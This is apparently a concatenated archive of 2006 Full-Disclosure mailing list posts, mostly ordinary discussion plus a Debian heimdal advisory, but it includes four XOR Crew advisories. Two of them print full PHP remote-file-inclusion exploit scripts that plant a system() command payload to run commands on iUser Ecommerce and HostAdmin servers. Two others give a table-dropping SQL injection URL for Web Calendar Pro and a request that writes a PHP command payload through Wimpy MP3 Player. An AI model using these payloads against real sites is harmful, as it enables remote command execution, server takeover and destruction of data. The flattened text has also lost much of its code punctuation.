NEe5cPDCTfyqPIH53PziZpSS67twQX7mekC9tiDfmzfAaeiLUyLjFonm4sT58d9e gY1bX7bdnL+jCdWyrOjFajEccPTOYkc+WighGDnfW75sdcFfcIWLCaxqFnXGZPdR i8R8A3d3ooHAD9/iqTFn7IIIneQIPS43QlaYhpn/m/xf6sjkLxLSKMb1hwc0+0d9 xM4Xhsx3aAI= =ve/Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: What can a Remote Vulnerability Scanner do in Future?
Nessus can do local checks on windows/unix from remote. nessus.org. Dont let the good looking web site scare you either. It is still free afaik. :) --Aaron On Mon, 13 Feb 2006 10:16:22 +1100 (EST) Tim Nelson [EMAIL PROTECTED] wrote: On Mon, 6 Feb 2006, Alice Bryson wrote: ... Eeye scanner could not do remote local check too. So I am consider what can Remote Vulnerability Scanner do? Will this thing disappear in the future? Scan for remote vulnerabilities. Scanning for local vulnerabilities can obviously only be done locally. Basically you need to have a remote access method before you can do anything remotely. It might be useful to get a windows version of sshd or cfengine. Another possibility would be to make the local scanner executable available on the network, and then have each machine individually download it and run it locally. Basically, to check for local vulnerabilities, you need: 1. A deployment process (hopefully simple) 2. An execution process This is exactly what cfengine was designed to solve in the Unix world. -- Kind Regards, Tim Nelson Server Administrator P: 03 9934 0888 F: 03 9934 0899 E: [EMAIL PROTECTED] W: www.webalive.biz WebAlive Technologies Level 1, Innovation Building Digital Harbour 1010 La Trobe Street Docklands Melbourne VIC 3008 This email (including all attachments) is intended solely for the named addressee. It is confidential and may contain legally privileged information. If you receive it in error, please let us know by reply email, delete it from your system and destroy any copies. This email is also subject to copyright. No part of it should be reproduced, adapted or transmitted without the written consent of the copyright owner. Emails may be interfered with, may contain computer viruses or other defects and may not be successfully replicated on other systems. We give no warranties in relation to these matters. If you have any doubts about the authenticity of an email purportedly sent by us, please contact us immediately. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iUser Ecommerce - Remote Command Execution Vulnerability
===XOR Crew :: Security Advisory 1/10/2006===
iUser Ecommerce - Remote Command Execution Vulnerability===http://www.xorcrew.net/===
:: Summary Vendor : Intensive Point Vendor Site : http://www.intensivepoint.com/ Product(s) : iUser Ecommerce - shopping cart for digital products
Version(s) : All Severity : Medium/High Impact : Remote Command Execution Release Date : 1/10/2006 Credits : ReZEN (rezen (a) xorcrew (.) net)===
I. DescriptionThe iUser digital products shopping cart system has a broad range of features, givingyou an incredible amount of flexibility, while remaining secure, easy to implement andadminister. There is simply no other comparable shopping cart solution specializing in
software downloads distribution available on the market at this price!===II. SynopsisThere is a remote file inclusion vulnerability that allows for remote command execution
in the common.php file. The bug is here on lines 28, 29, and 32: // Load iuser configuration files@require($include_path . setup.php);@require($include_path . config.php);
// Load misc functionsrequire($include_path . util.php); the $include_path variable is not set prior to being used in the require() function.The vendor has been contacted and the issue has been resolved.
===Exploit code:-BEGIN-?php/*iUser Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gfurl: http://www.xorcrew.net/ReZEN*/$cmd = $_POST[cmd];$turl = $_POST[turl];
$hurl = $_POST[hurl];$form= form method=\post\ action=""> .turl:brinput type=\text\ name=\turl\ size=\90\ value=\.$turl.\br
.hurl:brinput type=\text\ name=\hurl\ size=\90\ value=\.$hurl.\br .cmd:brinput type=\text\ name=\cmd\ size=\90\ value=\.$cmd.\br
.input type=\submit\ value=\Submit\ name=\submit\./formHR WIDTH=\650\ ALIGN=\LEFT\;if (!isset($_POST['submit']))
{echo $form;}else{$file = fopen (test.txt, w+);fwrite($file, ?php system(\.$cmd.\); ?);fclose($file);$file = fopen ($turl.$hurl, r);
if (!$file) {echo pUnable to get output.\n;exit;}echo $form;while (!feof ($file)) { $line = fgets ($file, 1024);echo $line.br;
}}?--END--===IV. Greets :All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
===
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Web Calendar Pro - Denial of Service SQL Injection Vulnerability
===XOR Crew :: Security Advisory 1/12/2006=== Web Calendar Pro - Denial of Service SQL injection (lame)===http://www.xorcrew.net/ ===:: Summary Vendor : MitriDAT Vendor Site : http://www.web-calendar-pro.com/ Product(s) : Web Calendar Pro Version(s) : All Severity : Low/Medium Impact : Denial of Service Release Date : 1/12/2006 Credits : ReZEN (rezen (a) xorcrew (.) net) ===I. DescriptionWeb Calendar Pro is a powerful yet easy to use multi-language calendar system foryour website or your personal planning needs. This product can support unlimited amount of web calendars, each of those can have its own settings. With Web CalendarPro you could handle a big public schedule for publishing events on your site, withseveral users granted different rights for managing this calendar events and unlimited amount of subscribers, private calendar for managing your own tasks, or just a minicalendar to add more interactivity to your web site.=== II. SynopsisThere is an unsanitized $tabls variable that allows for SQL injection in to the DROPquery from the dropbase.php file. This causes the script to become un-opperationaluntil the table has been fixed or until the application has been reinstalled. The vendor has been made aware of this situation and has fixed the issue. Please upgrade to thelatest version.Example:http://www.site.com/pathtocalendar/dropbase.php?tabls= ' or 1=1 --===IV. Greets :All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend. === ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HostAdmin - Remote Command Execution Vulnerability
===XOR Crew :: Security Advisory 2/11/2006===
HostAdmin - Remote Command Execution Vulnerability===http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN===:: Summary Vendor : DreamCost Vendor Site :
http://www.dreamcost.com/ Product(s) : HostAdmin - Automated Hosting Suite Version(s) : All Severity : Medium/High Impact : Remote Command Execution Release Date : 2/11/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)===I. DescriptionBy creating a product that integrates with the major payment processors, registrars,
and provisioning tools on the market, HostAdmin gives your hosting company the power to bill and activate hosting accounts in real-time, even while you sleep at night!===
II. SynopsisThere is a remote file inclusion vulnerability that allows for remote command executionin the index.php file. The bug is here on lines 5, 6, and 7: require(setup.php);
require(functions.php);require(db.conf);require($path . que.php);require($path . provisioning_manager.php);require($path . registrar_manager.php);
the $path variable is not set prior to being used in the require() function.The vendor is no longer offering updates for this software.===
Exploit code:-BEGIN-?php/*HostAdmin Remote File Inclusion Exploit c0ded by ReZENSh0uts: xorcrew.net, ajax, gml, #subterrain, My gfurl:
http://www.xorcrew.net/ReZEN*/$cmd = $_POST[cmd];$turl = $_POST[turl];$hurl = $_POST[hurl];$form= form method=\post\ action=""
.turl:brinput type=\text\ name=\turl\ size=\90\ value=\.$turl.\br.hurl:brinput type=\text\ name=\hurl\ size=\90\ value=\.$hurl.\br
.cmd:brinput type=\text\ name=\cmd\ size=\90\ value=\.$cmd.\br.input type=\submit\ value=\Submit\ name=\submit\
./formHR WIDTH=\650\ ALIGN=\LEFT\;if (!isset($_POST['submit'])) {echo $form;}else{$file = fopen (test.txt, w+);
fwrite($file, ?php system(\echo ++BEGIN++\); system(\.$cmd.\); system(\echo ++END++\); ?);fclose($file);$file = fopen ($turl.$hurl, r);
if (!$file) {echo pUnable to get output.\n;exit;}echo $form;while (!feof ($file)) {$line .= fgets ($file, 1024).br;}$tpos1 = strpos($line, ++BEGIN++);
$tpos2 = strpos($line, ++END++);$tpos1 = $tpos1+strlen(++BEGIN++);$tpos2 = $tpos2-$tpos1;$output = substr($line, $tpos1, $tpos2);echo $output;}?--END--
===IV. Greets :All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.===
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wimpy MP3 Player - Text file overwrite vulnerability
===XOR Crew :: Security Advisory 2/10/2006=== Wimpy MP3 Player - Text file overwrite. (lame)===http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN/===:: Summary Vendor : Plaino Inc. Vendor Site : http://www.wimpyplayer.com/ Product(s) : Wimpy MP3 PLayer Version(s) : All Severity : Low Impact : trackme.txt overwrite Release Date : 2/10/2006 Credits : ReZEN (rezen (a) xorcrew (.) net) ===I. DescriptionWimpy provides a simple, clean, enjoyable listening experience for your website'svisitors. Lists and plays an entire directory full of mp3 files automatically. ===II. SynopsisThe file wimpy_trackplays.php does not check the variables passed to it prior to writing the contents of those variables to trackme.txt. That allows us to write anything we want to trackme.txt. This is not really a problem for the server running wimpy. The problem lies in the fact that being able to write to trackme.txt allowsthe attacker a jump off point for other Remote Command Execution Bugs that read from text files. These bugs are quite common and thus wimpy aids the attacker in stayingannonymous. Example:http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays trackFile=?phptrackArtist=system(uname -a;id;);trackTitle=?that writes:?phpsystem(uname -a;id;);?to trackme.txt. Then all the attacker has to do is point is RCE exploit to trackme.txtand there you have it. So yeah lame vuln but interesting. Peace out.===IV. Greets :All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend. === ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer dragdrop 0day
Hi Thierry, I think I understand now. You did it for the `shock` effect. I guess it is nothing more than a matter of opinion. ( I mean this to be nothing more than... a free bit of market research I suppose. ) My opinion being that; most users would find it an invasive and deceptive tactic. e.g. If a company was found to have released a successful virus campaign and their product was the only protection against it. I wouldn't purchase that product. Or the far more ridiculous: The door to door salesman who pours cranberry juice on the old lady's carpet doesn't get the chance to prove how well the vacuum cleaner works. This is hardly worth reading so I'm going to stop writing it. Good luck Thierry. Markus -- Dear Markus, M under the heading Do you have a demonstration ?, both links to the M demo exploit are dead. Yes they are, I was to lazy to remove them. I will replace them with some working PoC heise.de links. M I assume in an attempt to hide the target url you meant to use the M * onclick * javascript event, or even the * onmousedown * or * onmouse * up, M but surely not the * onmouseover * ! No I used on mouse over. The exploit was a PoC nothing more, I think to recall it launched calc.exe or similar (google for shreddersub7) M You are aware that you current chosen method would have launched your M exploit on the machine of a prospective customer, The links are supposed to do so. M Please give your web designer a whack on the side of the head though. That would be me ouch! that hurt. I know I need a redesign for sake of usability. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Re: Fun with Foundstone
Sure !! With the credits intact ;o) - Deb -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave Korn Sent: Thursday, February 16, 2006 12:46 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Re: Re: Fun with Foundstone Debasis Mohanty wrote: Does this mean, Dave's age is inbetween 3 - 4 yrs ?? =) - D :-) That's so much more flattering than when people mistake me for the grey-haired man in his 60's who used to work for AT+T! Say, Deb, next time people ask me if I wrote the Korn Shell, can I quote your post to them? cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Kyocera Network Printers
Hi, Please see the link below for an example of compromising Kyocera Network Printers. http://evader.wordpress.com/2006/02/16/kyocera-printers/ Hope someone finds this useful. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] What is the state of vulnerability research?
This is a series of open questions to people who consider themselves to be vulnerability researchers. Hopefully this will open a number of fruitful public discussions. 1) What is the state of vulnerability research? 2) What have researchers accomplished so far? 3) What are the greatest challenges that researchers face? 4) What, if anything, could researchers accomplish collectively that they have not been able to accomplish as individuals? 5) Should the ultimate goal of research be to improve computer security overall? 6) What is an elite researcher? Who are the elite researchers? 7) Who are the researchers who do not get as much recognition as they deserve? Why am I asking? Because I don't think this topic has been covered quite in this fashion, and it's about time it did. Feel free to respond to me privately. If I receive more than a couple responses, I will post a summary. Thanks to James Bercegay, KF, Luigi Auriemma, Matthew Murphy, and Kurt Seifried for beta-testing the first 5 questions by providing a variety of responses :) - Steve P.S. If you're further interested in letting your voice be heard, check out Richard Forno's disclosure survey at http://www.infowarrior.org/survey.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 977-1] New heimdal packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 977-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 16th, 2006 http://www.debian.org/security/faq - -- Package: heimdal Vulnerability : several Problem type : remote Debian-specific: no CVE IDs: CVE-2006-0582 CVE-2006-0677 CERT advisory : BugTraq ID : Debian Bug : Two vulnerabilities have been discovered in heimdal, a free implementation of Kerberos 5. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities: CVE-2006-0582 Privilege escalation in the rsh server allows an authenticated attacker to overwrite arbitrary files and gain ownership of them. CVE-2006-0677 A remote attacker could force the telnet server to crash before the user logged in, resulting in inetd turning telnetd off because it forked too fast. The old stable distribution (woody) does not expose rsh and telnet servers. For the stable distribution (sarge) these problems have been fixed in version 0.6.3-10sarge2. For the unstable distribution (sid) these problems will be fixed soon. We recommend that you upgrade your heimdal packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/heimdal/heimdal_0.6.3-10sarge2.dsc Size/MD5 checksum: 1022 e10ac60af505b2c808c8e06109237753 http://security.debian.org/pool/updates/main/h/heimdal/heimdal_0.6.3-10sarge2.diff.gz Size/MD5 checksum: 3220033 df09ee1a184485a19e6985b75d5f96cf http://security.debian.org/pool/updates/main/h/heimdal/heimdal_0.6.3.orig.tar.gz Size/MD5 checksum: 3321408 2a9d4bfbdaade7132279758ccd5c0c4f Architecture independent components: http://security.debian.org/pool/updates/main/h/heimdal/heimdal-docs_0.6.3-10sarge2_all.deb Size/MD5 checksum: 1166966 4e8c53168e9d1c884cc288d5fe3df8d1 Alpha architecture: http://security.debian.org/pool/updates/main/h/heimdal/heimdal-clients_0.6.3-10sarge2_alpha.deb Size/MD5 checksum: 308168 d3dec13290df9230d69cc52655c023d2 http://security.debian.org/pool/updates/main/h/heimdal/heimdal-clients-x_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:70068 eb02f90108c50bfe2edf48c41d49ca4b http://security.debian.org/pool/updates/main/h/heimdal/heimdal-dev_0.6.3-10sarge2_alpha.deb Size/MD5 checksum: 584820 8cfceef35c62d06fa50d8c690b025459 http://security.debian.org/pool/updates/main/h/heimdal/heimdal-kdc_0.6.3-10sarge2_alpha.deb Size/MD5 checksum: 146738 7b513c8d5db45e7ca49a8a66297446ea http://security.debian.org/pool/updates/main/h/heimdal/heimdal-servers_0.6.3-10sarge2_alpha.deb Size/MD5 checksum: 197460 44958184561d6014ba189d096c56da76 http://security.debian.org/pool/updates/main/h/heimdal/heimdal-servers-x_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:46004 40ca4b4bfaa57adabeb9145612a47fc1 http://security.debian.org/pool/updates/main/h/heimdal/libasn1-6-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:77658 3d66c5918c0b37c6e489679914218eb7 http://security.debian.org/pool/updates/main/h/heimdal/libgssapi1-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:57760 22fee002e9dfbdc56cc63edd740ae6d4 http://security.debian.org/pool/updates/main/h/heimdal/libhdb7-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:54470 dc7803799fee7d03d9bab860507eb19d http://security.debian.org/pool/updates/main/h/heimdal/libkadm5clnt4-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:39528 af0a21decdadd174d6940f4f1ef2f5d3 http://security.debian.org/pool/updates/main/h/heimdal/libkadm5srv7-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:50552 c3a1f1f7900a81942bd418a81e97a150 http://security.debian.org/pool/updates/main/h/heimdal/libkafs0-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum:38752 b9e9389950f3725f7f05e17274b6a6e1 http://security.debian.org/pool/updates/main/h/heimdal/libkrb5-17-heimdal_0.6.3-10sarge2_alpha.deb Size/MD5 checksum: 157166 a55fc05a97a33b70a06167ebbe3fb77d AMD64 architecture:
